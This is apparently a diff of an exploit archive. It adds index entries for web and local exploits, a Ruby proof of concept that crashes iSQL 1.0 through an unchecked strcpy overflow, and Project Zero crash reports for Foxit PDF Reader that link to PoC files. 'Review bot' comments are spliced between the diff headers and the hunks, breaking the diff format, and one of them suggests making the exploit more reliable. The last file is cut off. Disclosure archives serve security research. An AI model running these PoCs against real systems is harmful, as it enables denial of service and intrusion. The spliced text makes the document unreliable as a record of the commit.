diff --git a/files.csv b/files.csv
index cc0b8457b..342d3dd26 100755
--- a/files.csv
+++ b/files.csv
@@ -36109,3 +36109,17 @@ id,file,description,date,author,platform,type,port
 39928,platforms/osx/dos/39928.c,"OS X Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0
 39929,platforms/multiple/dos/39929.c,"OS X/iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0
 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
+39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
+39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
+39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
+39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
+39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
+39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
+39937,platforms/php/webapps/39937.py,"Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC",2016-06-13,"Alexander Gurin",php,webapps,80
+39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0
+39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow PoC",2016-06-13,HaHwul,linux,dos,0
+39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
+39941,platforms/linux/dos/39941.txt,"Foxit PDF 
Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0
+39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
+39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
+39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
diff --git a/platforms/linux/dos/39939.rb b/platforms/linux/dos/39939.rb
new file mode 100755
index 000000000..b260b95d1
--- /dev/null
+++ b/platforms/linux/dos/39939.rb
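Review bot: The description for entry 39943 is written `"Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption"`, with no space after the dash, while the neighbouring Foxit rows (39940, 39941, 39942, 39944) all separate product and detail with `- `; it should read `Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption` so the index stays consistent for anything that splits titles on the `Product - Detail` pattern. The author field is also left unquoted as `HaHwul` on rows 39938 and 39939 while every other row quotes it; that is still valid CSV, but quoting it would match the file's own convention.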
@@ -0,0 +1,64 @@
+#!/bin/ruby
+# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
+# Date: 2016-06-13
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/roselone/iSQL
+# Software Link: https://github.com/roselone/iSQL/archive/master.zip
+# Version: 1.0
+# Tested on: Debian [wheezy]
+# CVE : none
+=begin
+### Vulnerability Point
+ :: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
+ :: don't check str size
+446 char *get_MD5(char *str){
+447 FILE *stream;
+448 char *buf=malloc(sizeof(char)*33);
+449 char cmd[100];
+450 memset(buf,'\0',sizeof(buf));
+451 memset(cmd,'\0',sizeof(cmd));
+452 strcpy(cmd,"echo "); //5
+453 strcpy((char *)cmd+5,str);
+
+Edit makefile > CFLAGS = -fno-stack-protector
+#> make
+
+### gdb history
+(gdb) r
+Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql
+
+*************** welcome to ISQL ****************
+* version 1.0 *
+* Designed by RL *
+* Copyright (c) 2011, RL. All rights reserved *
+************************************************
+
+>username: hwul_test
+>password: AAAAAAAAAAAAAAAAAAAAAAAAAA... ("A" * 800)
+Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()
+
+(gdb) x/s $rax
+0x4141414141414141:
+
+(gdb) x/s $rbp
+0x4141414141414141:
+
+### Registers
+(gdb) i r
+rax 0x4141414141414141 4702111234474983745
+rbx 0x0 0
+rcx 0x7ffff7b06480 140737348920448
+rdx 0x0 0
+rsi 0x60b610 6338064
+rdi 0x5 5
+rbp 0x4141414141414141 0x4141414141414141
+rsp 0x7fffffffe948 0x7fffffffe948
+r8 0xffffffff 4294967295
+r9 0x0
+=end
+puts "iSQL 1.0 - Buffer Overflow"
+puts " - by hahwul"
+puts " - Run BUG.."
+buffer = "A"*800
+system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")
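Review bot: The shebang `#!/bin/ruby` on the first line points at a path most distributions do not provide (the interpreter normally lives under /usr/bin), so the file only runs when started through `ruby` explicitly; `#!/usr/bin/env ruby` is the portable form. The `system(...)` call on the last line also hands the whole pipeline to `/bin/sh` as a single string, and on Debian, the stated test platform, `/bin/sh` is dash, whose builtin `echo` treats `-en` as ordinary text rather than as flags, so the first input line presumably reaches the program as `-en hwul` rather than `hwul`; the gdb transcript in the header shows `hwul_test` as the username, which the script never sends either, so the header and the code disagree about the reproduction input. Emitting the two lines with `printf` instead of `echo -en` removes the dependency on a bash-specific echo, and a one-line comment above the call stating the shell it assumes would make the reproduction conditions explicit.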
diff --git a/platforms/linux/dos/39940.txt b/platforms/linux/dos/39940.txt
new file mode 100755
index 000000000..1f330bbd1
--- /dev/null
+++ b/platforms/linux/dos/39940.txt
@@ -0,0 +1,105 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741
+
+We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 ***
+[New Thread 0x7fffdfa16700 (LWP 26721)]
+[New Thread 0x7fffe0217700 (LWP 26720)]
+[New Thread 0x7fffe0a18700 (LWP 26718)]
+[New Thread 0x7fffe97cd700 (LWP 26717)]
+
+Program received signal SIGABRT, Aborted.
+0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
+(gdb) where +#0 0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#1 0x00007ffff4fc40a8 in __GI_abort () at abort.c:89 +#2 0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1, + fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 +#3 0x00007ffff500bef6 in malloc_printerr (ptr=, + str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996 +#4 free_check (mem=, caller=) at hooks.c:298 +#5 0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() () +#6 0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) () +#7 0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) () +#8 0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0) + at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792 +#9 0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0) + at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23 +#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) () +#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) () +#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() () +#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint 
const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from 
/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () +---Type to continue, or q to quit--- + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74e0973 in ?? 
() from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#49 0x00007ffff633f96b in QEventLoop::exec(QFlags) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310 +--- cut --- + +Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. 
While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39940.zip
+
diff --git a/platforms/linux/dos/39941.txt b/platforms/linux/dos/39941.txt
new file mode 100755
index 000000000..d80b74c55
--- /dev/null
+++ b/platforms/linux/dos/39941.txt
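Review bot: The crash log committed in this file has lost every angle-bracketed token, which looks like the text went through an HTML-stripping step before being pasted: frame #3 reads `malloc_printerr (ptr=,` and frame #4 `free_check (mem=, caller=)`, where gdb would presumably have printed `<optimized out>`, and the Qt frames show `QList const&` and `QFlags` with their template arguments missing. The same truncation is visible in the Qt frames of 39941.txt and 39942.txt. As archived, the backtrace cannot be matched against a fresh gdb session without guessing what was removed; re-pasting the log from the Project Zero issue named on the `Source:` line at the top of the file would restore the dropped text.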
@@ -0,0 +1,113 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744
+
+We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const ()
+(gdb) where
+#0 0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const
+ ()
+#1 0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const ()
+#2 0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const ()
+#3 0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() ()
+#4 0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#5 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#6 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#7 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#8 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
+#9 
0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) () +#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) () +#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) () +#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) () +#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) () +#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) () +#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) () +#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() () +#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) () +#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0) + at ../../Readerlite/ReaderLite/src/preview.cpp:1305 +#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from 
/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () +---Type to continue, or q to quit--- + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from 
/usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#41 0x00007ffff74e0973 in ?? 
() from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5 +#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) () + from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5 +#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5 +#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so +#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 +#50 0x00007ffff4a7a048 in ?? 
() from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags) ()
+ from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#53 0x00007ffff633f96b in QEventLoop::exec(QFlags) ()
+ from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
+(gdb) x/10i $rip
+=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>: mov 0x2(%rbp),%dl
+ 0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>: add $0x3,%r13
+ 0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>: add $0x3,%rbp
+ 0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>: inc %eax
+ 0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>: mov %dl,-0x3(%r13)
+ 0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>: mov -0x2(%rbp),%dl
+ 0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>: mov %dl,-0x2(%r13)
+ 0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>: mov -0x3(%rbp),%dl
+ 0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>: mov %dl,-0x1(%r13)
+ 0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>:
+ jmp 0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179>
+(gdb) info reg $rbp
+rbp 0x1a30fff 0x1a30fff
+--- cut ---
+
+Attached is a proof of concept PDF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39941.zip
+
diff --git a/platforms/linux/dos/39942.txt b/platforms/linux/dos/39942.txt
new file mode 100755
index 000000000..1236ce25b
--- /dev/null
+++ b/platforms/linux/dos/39942.txt
@@ -0,0 +1,119 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745
+
+We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
+(gdb) where
+#0 0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
+#1 0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
+#2 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
